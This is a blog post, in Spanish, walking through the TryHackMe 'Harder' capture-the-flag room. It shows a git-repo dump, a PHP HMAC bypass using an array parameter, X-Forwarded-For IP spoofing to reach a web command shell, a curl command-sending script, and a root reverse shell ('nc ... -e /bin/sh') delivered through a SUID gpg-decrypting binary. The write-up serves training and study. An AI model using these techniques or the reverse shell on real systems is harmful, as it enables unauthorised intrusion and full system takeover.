<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

  <title>Harder Writeup</title>
  <meta property="og:title" content="Harder Writeup" />
  <meta name="twitter:title" content="Harder Writeup" />
  <meta name="description" content="Explotando Harder en Tryhackme">
  <meta property="og:description" content="Explotando Harder en Tryhackme">
  <meta name="twitter:description" content="Explotando Harder en Tryhackme">
  <meta name="author" content="Ps-axu"/>
  <link href='https://ps-axu.com/img/50-50.de.svg' rel='icon' type='image/x-icon'/>
  <meta property="og:image" content="https://ps-axu.com/img/avatar-favicon3-De.png" />
  <meta name="twitter:image" content="https://ps-axu.com/img/avatar-favicon3-De.png" />
  <meta name="twitter:card" content="summary" />
  <meta property="og:url" content="https://ps-axu.com/post/2021-04-18-harder-writeup/" />
  <meta property="og:type" content="website" />
  <meta property="og:site_name" content="ps-axu" />

  <meta name="generator" content="Hugo 0.54.0" />
  <link rel="canonical" href="https://ps-axu.com/post/2021-04-18-harder-writeup/" />
  <link rel="alternate" href="https://ps-axu.com/index.xml" type="application/rss+xml" title="ps-axu">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.css" integrity="sha384-wITovz90syo1dJWVh32uuETPVEtGigN07tkttEqPv+uR2SE/mbQcG7ATL28aI9H0" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" crossorigin="anonymous">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
  <link rel="stylesheet" href="https://ps-axu.com/css/main.css" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" />
  <link rel="stylesheet" href="https://ps-axu.com/css/pygment_highlights.css" />
  <link rel="stylesheet" href="https://ps-axu.com/css/highlight.min.css" />

</head>

  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://ps-axu.com/">ps-axu</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Blog" href="https://ps-axu.com/">Blog</a>
            </li>
          
        
          
            <li>
              <a title="Tags" href="https://ps-axu.com/tags">Tags</a>
            </li>
          
        

        

        
      </ul>
    </div>

    <div class="avatar-container">
      <div class="avatar-img-border">
        
          <a title="ps-axu" href="https://ps-axu.com/">
            <img class="avatar-img" src="https://ps-axu.com/img/avatar-favicon3-De.png" alt="ps-axu" />
          </a>
        
      </div>
    </div>

  </div>
</nav>




    
  
  
  




  

  <header class="header-section ">
    
    <div class="intro-header no-img">
      
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="post-heading">
              <h1>Harder Writeup</h1>
                
                  
                    <h2 class="post-subheading">Explotando Harder en Tryhackme</h2>
                  
                
                
                  <span class="post-meta">
  Posted on April 18, 2021
  
</span>


                
            </div>
          </div>
        </div>
      </div>
    </div>
  </header>


    
<div class="container">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        

<p><img src="../../img/harder.png" alt="" /></p>

<blockquote>
<p>Esta máquina está completamente inspirada en un pentesting real. Puede que sea un desafío pero no encontrarás ningun rabbit hole.</p>
</blockquote>

<h2 id="enumeración">Enumeración</h2>

<p>Tras un escaneo veo que la máquina tiene <strong>3 puertos</strong> abiertos.</p>

<pre><code>PORT   STATE SERVICE     REASON
2/tcp  open  compressnet syn-ack
22/tcp open  ssh         syn-ack
80/tcp open  http        syn-ack
</code></pre>

<p>Utilizo netcat para poder averiguar que tipos de servicios estan detrás de esos puertos.</p>

<pre><code>nc 10.10.224.104 22
SSH-2.0-OpenSSH_8.3


nc 10.10.224.104 2
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
</code></pre>

<p>Por alguna razón cuenta con 2 ssh distintos&hellip;</p>

<p>Accedo a puerto 80 desde el navegador. La página no existe.</p>

<p><img src="../../img/harder-1.png" alt="image alt" /></p>

<p>Pero en el navegador vemos una referencia interesante a un dominio en las cookies pwd.harder.local.</p>

<p><img src="../../img/harder-2.png" alt="image alt" /></p>

<p>Añadimos este dominio a nuestro host file y volvemos vamos al navegador para ver donde nos lleva.</p>

<pre><code>echo &quot;10.10.204.104 pwd.harder.local&quot; &gt;&gt; /etc/hosts
</code></pre>

<p>Nos encontramos con un portal de autentificación. Pruebo primero a poner hola@hola y me dice que los credenciales no son válidos. Depués pruebo con Admin@Admin.</p>

<p><img src="../../img/harder-3.png" alt="image alt" /></p>

<p><strong>extra security in place. our source code will be reviewed soon &hellip;</strong></p>

<p>Parece ser que estos credenciales sí son correctos pero no nos llevan a ningún lado.</p>

<p>Procedo a hacer fuzzing en web para ver si nos estamos perdiendo algo.</p>

<p>Pruebo con <code>gobuster</code>:</p>

<pre><code>./gobuster dir -u http://pwd.harder.local/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
</code></pre>

<p>Pero después de un rato no me aroja ningún resultado así que decido cambiar de
fuzzer, esta vez con <code>dirb</code>.</p>

<pre><code>dirb http://pwd.harder.local
</code></pre>

<p><img src="../../img/harder-4.png" alt="image alt" /></p>

<p>Nos muestra que la página en si es un <strong>repo de git</strong>.</p>

<p>Existe una herramienta para dumpear todo el contenido de un repositorio git se llama <code>gitdumper</code>, su uso es muy sencillo.</p>

<pre><code>git-dumper -u http:/pwd.harder.local gitdump/
</code></pre>

<p><img src="../../img/harder-5.png" alt="image alt" /></p>

<h2 id="explotación">Explotación</h2>

<p>Abrimos el index y vemos que llama a <strong>auth.php</strong>, <strong>hmac.php</strong> y a <strong>credentials</strong>.</p>

<p>Según hemos visto en el .gitignore existen otros ficheros que no tenemos así que tendremos que encontrar otra forma de afrontarlo.</p>

<h3 id="index-php">index.php</h3>

<pre><code>&lt;?php
  session_start();
  require(&quot;auth.php&quot;);
  $login = new Login;
  $login-&gt;authorize();
  require(&quot;hmac.php&quot;);
  require(&quot;credentials.php&quot;);
?&gt; 
</code></pre>

<p>Nos vamos a <strong>auth.php</strong> y lo que sacamos de aquí es que efectivamente el usuario y la contraseña eran admin/admin y por otro lado esta parte del código es la que se encarga de comprobar las coockies una vez estamos autentificados. Cosa que ahora no nos interesa, así que nos vamos al <strong>hmac.php</strong>.</p>

<h3 id="auth-php">auth.php</h3>

<pre><code>&lt;?php
define('LOGIN_USER', &quot;admin&quot;);
define('LOGIN_PASS', &quot;admin&quot;);

....
....
....

  function authorize() {
        //save cookie info to session
        if(isset($_COOKIE[$this-&gt;prefix.'user'])){
                $_SESSION[$this-&gt;prefix.'user'] = $_COOKIE[$this-&gt;prefix.'user'];
                $_SESSION[$this-&gt;prefix.'pass'] = $_COOKIE[$this-&gt;prefix.'pass'];
        }
</code></pre>

<h3 id="hmac-php">hmac.php</h3>

<p>Aquí es donde viene lo interesante, según como ha planteado el codigo el desarollador existe la posibilidad de bypasear esta comprobación.</p>

<pre><code>if (empty($_GET['h']) || empty($_GET['host'])) {
   header('HTTP/1.0 400 Bad Request');
   print(&quot;missing get parameter&quot;);
   die();
}
require(&quot;secret.php&quot;); //set $secret var
if (isset($_GET['n'])) {
   $secret = hash_hmac('sha256', $_GET['n'], $secret);
}

$hm = hash_hmac('sha256', $_GET['host'], $secret);
if ($hm !== $_GET['h']){
  header('HTTP/1.0 403 Forbidden');
  print(&quot;extra security check failed&quot;);
  die();
</code></pre>

<p>La funciión <code>hash_hmac()</code> genera un hashes. Recibe el tipo de algoritmo a aplicar, la llave a utilizar y los datos a hashear:</p>

<p><code>hash_hmac('Algoritmo a aplicar', 'datos a hashear',' clave a utilizar')</code></p>

<p>Lo interesante de esta función es que cuando se le pasa un array en vez de una cadena como <strong>datos a hashear</strong>, la función en vez de devolver un hash devuelve <strong>FALSE</strong>.</p>

<p>Entonces tengamos el supuesto donde <code>n</code> es  <code>n[1,2]</code> la la cosa quedaría así:</p>

<pre><code>$secret = hash_hmac('sha256', n[1,2], $secret);

echo $secret

output: False
</code></pre>

<p>Bueno, ¿y Para qué nos sirve que este <code>$secret</code> nos devuelva <strong>false</strong>? Pues bien, resulta que la función <code>hash_hmac()</code> si recibe como llave <strong>False</strong> simplemente creará un hash con el algoritmo seleccionado y los datos introducidos.</p>

<p>Esto nos dá pie a poder generar nosotros <strong>nuestros propios hashes Sha256</strong> en nuestra maquina local para saber el hash que generamos pasandole cualquier texto que queramos.</p>

<pre><code>&lt;?php
$hm = hash_hmac('sha256', &quot;hola&quot;, false);
echo $hm;
?&gt;
</code></pre>

<pre><code>php evil.php 
ad56d1d3cef70fdf5ae0ecd769c8912415f195a7adf7fb5e4f523fed5aca05f4 
</code></pre>

<p>Ya tenemos nuestro hash listo! Ahora tendríamos que craftear la url para pasar los diferentes argumentos y bypasear la comprobación.</p>

<pre><code>n -&gt; n[1]
host -&gt; hola
h - &gt; ad56d1d3cef70fdf5ae0ecd769c8912415f195a7adf7fb5e4f523fed5aca05f4
</code></pre>

<p>Esto nos quedaría algo tal que así:</p>

<pre><code>http://pwd.harder.local/index.php?n[1]&amp;host=hola&amp;h=ad56d1d3cef70fdf5ae0ecd769c8912415f195a7adf7fb5e4f523fed5aca05f4
</code></pre>

<p><img src="../../img/harder-6.png" alt="image alt" /></p>

<p>Tenemos nueva información, un nuevo dominio, <code>shell.harder.local</code> y unos credenciales.</p>

<p>Estos credenciales podrian se un usuario de la máquina. Pruebo a conectarme por <code>ssh</code> pero parece ser que no tenemos acceso por <code>ssh</code>.</p>

<pre><code>└─$ ssh evs@10.10.65.109
The authenticity of host '10.10.65.109 (10.10.65.109)' can't be established.
ED25519 key fingerprint is SHA256:qe/uay80+hZjgfhQilcT9xOMMgrAk0nCK7Ng5g7bLMM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.65.109' (ED25519) to the list of known hosts.
evs@10.10.65.109's password: 
Permission denied, please try again.
</code></pre>

<p>Vamos al nuevo dominio y nos encontramos con otro portal de autentificación.</p>

<p><img src="../../img/harder-7.png" alt="image alt" /></p>

<p>Probamos los credenciales anteriores pero parece que están limitando el acceso por ip.</p>

<pre><code>Your IP is not allowed to use this webservice. Only 10.10.10.x is allowed
</code></pre>

<p>Analizando las cabezeras con <code>burpsuite</code> vemos lo siguiente.</p>

<p><img src="../../img/harder-8.png" alt="image alt" /></p>

<p>Existe una cabezera llamada <code>X-Forwarded-For</code> que se utiliza para indentificar la ip cliente que se está conectando via web a travez de un proxy. Añadimos esta cabezera con una ip dentro del rango permitido <code>X-Forwarded-For 10.10.10.2</code> y conseguimos bypasear el filtro de Ip, llegamos a lo que parece una consola de comandos.</p>

<p><img src="../../img/harder-9.png" alt="image alt" /></p>

<p>Probamos a enviar un comando pero nos vuelve a dar el mismo problema que antes, tenemos que añadir de nuevo la cabezera con la ip dentro del rango. Hacer esto con <code>burpsuite</code> me parece demasiado tedioso así copio toda la información de las peticiones para hacerlo todo con <code>curl</code>.</p>

<p>Preparo un pequeño script para poder lanzar comandos por argumentos:</p>

<pre><code>#!/bin/bash
curl -s -X POST &quot;http://shell.harder.local/index.php&quot; -d &quot;cmd=$1&quot; -H &quot;Cookie: PHPSESSID=qjegium4cpvu5jaep2hsbb2hdk&quot; -H &quot;X-Forwarded-For: 10.10.10.5&quot; | grep &quot;&lt;pre&gt;&quot; -a10 | grep -v &quot;&lt;\|&gt;&quot;
</code></pre>

<pre><code>./cmd.sh whoami
www
</code></pre>

<p>Buscando un poco por la máquina me encuentro en <code>/etc</code> una carpeta fuera de lo normal <code>periodic/</code>, dentro de ella hay otras carpetas pero en una de ellas encontramos un script llamado <strong>evs-backup.sh</strong>. Al abrirlo vemos que tiene unos credenciales. Pruebo estos nuevos credenciales mediante ssh.</p>

<p><img src="../../img/harder-10.png" alt="image alt" /></p>

<p>Busco archivos con permisos especiales:</p>

<pre><code>find . -perm /4000 2&gt;/dev/null
</code></pre>

<pre><code>./usr/local/bin/execute-crypted
</code></pre>

<p>Lo ejecutamos y practicamente nos muestra lo que tenemos que hacer paso a paso:</p>

<pre><code>[*] Current User: root
[-] This program runs only commands which are encypted for root@harder.local using gpg.
[-] Create a file like this: echo -n whoami &gt; command
[-] Encrypt the file and run the command: execute-crypted command.gpg
</code></pre>

<p>Pero primero tenemos que encontrar la clave gpg de root.</p>

<pre><code>find /  2&gt;/dev/null | grep &quot;root&quot;
/var/backup/root@harder.local.pub
</code></pre>

<p>Una vez tenemos localizada la clave gpg tenemos que añadirla a nuestro ring de claves publicas, para ello tenemos gpg import.</p>

<pre><code>gpg --import /var/backup/root@harder.local.pub
</code></pre>

<p>Una vez lista importada la clave creamos el archivo a cifrar:</p>

<pre><code>echo -n 'nc 10.11.34.53 4545 -e /bin/sh' &gt; cmd
</code></pre>

<p>Encriptamos el fichero con la clave publica de root:</p>

<pre><code>gpg -r root -e cmd
</code></pre>

<p>Donde <code>-r</code> se refiere al destinatario, en nuestro caso ponemos <code>root</code> para utilizar su clave publica y <code>-e</code> para encriptar.</p>

<p>Esto nos ha generado un fichero <code>.gpg</code> se lo pasamos al binario con suid&hellip;</p>

<p>Y conseguimos una shell de root:</p>

<pre><code>└─$ nc -vlp 4545
listening on [any] 4545 ...
connect to [10.11.34.53] from pwd.harder.local [10.10.65.109] 34439
whoami
root
</code></pre>

<h2 id="refs">Refs</h2>

<p><a href="https://tryhackme.com/room/harder">https://tryhackme.com/room/harder</a>
<a href="https://www.php.net/manual/es/function.hash-hmac.php">https://www.php.net/manual/es/function.hash-hmac.php</a>
<a href="https://tutorialdeep.com/knowhow/declare-an-array-php/">https://tutorialdeep.com/knowhow/declare-an-array-php/</a>
<a href="https://simple.wikipedia.org/wiki/X-Forwarded-For">https://simple.wikipedia.org/wiki/X-Forwarded-For</a></p>

      </article>

      <ul class="pager blog-pager">
        
          <li class="previous">
            <a href="https://ps-axu.com/post/2021-04-15-cloud-init-proxmox/" data-toggle="tooltip" data-placement="top" title="Cloud init en proxmox">&larr; Previous Post</a>
          </li>
        
        
          <li class="next">
            <a href="https://ps-axu.com/post/2021-04-19-diferentes-perfiles-web-en-firefox/" data-toggle="tooltip" data-placement="top" title="Perfiles en Firefox">Next Post &rarr;</a>
          </li>
        
      </ul>

      
        
      

    </div>
  </div>
</div>

    <footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
              <li>
                <a href="mailto:youremail@domain.com" title="Email me">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fas fa-envelope fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://gitlab.com/ps-axu" title="GitLab">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fab fa-gitlab fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://linkedin.com/in/Che-r" title="LinkedIn">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fab fa-linkedin fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
          
          <li>
            <a href="https://ps-axu.com/index.xml" title="RSS">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-rss fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
        </ul>
        <p class="credits copyright text-muted">
          Ps-axu
          &nbsp;&bull;&nbsp;
          2021

          
            &nbsp;&bull;&nbsp;
            <a href="https://ps-axu.com/">ps-axu</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="http://gohugo.io">Hugo v0.54.0</a> powered &nbsp;&bull;&nbsp; Theme by <a href="http://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a> adapted to <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a>
          
        </p>
      </div>
    </div>
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.js" integrity="sha384-/y1Nn9+QQAipbNQWU65krzJralCnuOasHncUFXGkdwntGeSvQicrYkiUBwsgUqc1" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/contrib/auto-render.min.js" integrity="sha384-dq1/gEHSxPZQ7DdrM82ID4YVol9BYyU7GbWlIwnwyPzotpoc57wDw/guX8EaYGPx" crossorigin="anonymous"></script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js" integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://ps-axu.com/js/main.js"></script>
<script src="https://ps-axu.com/js/highlight.min.js"></script>
<script> hljs.initHighlightingOnLoad(); </script>
<script> renderMathInElement(document.body); </script>





  </body>
</html>

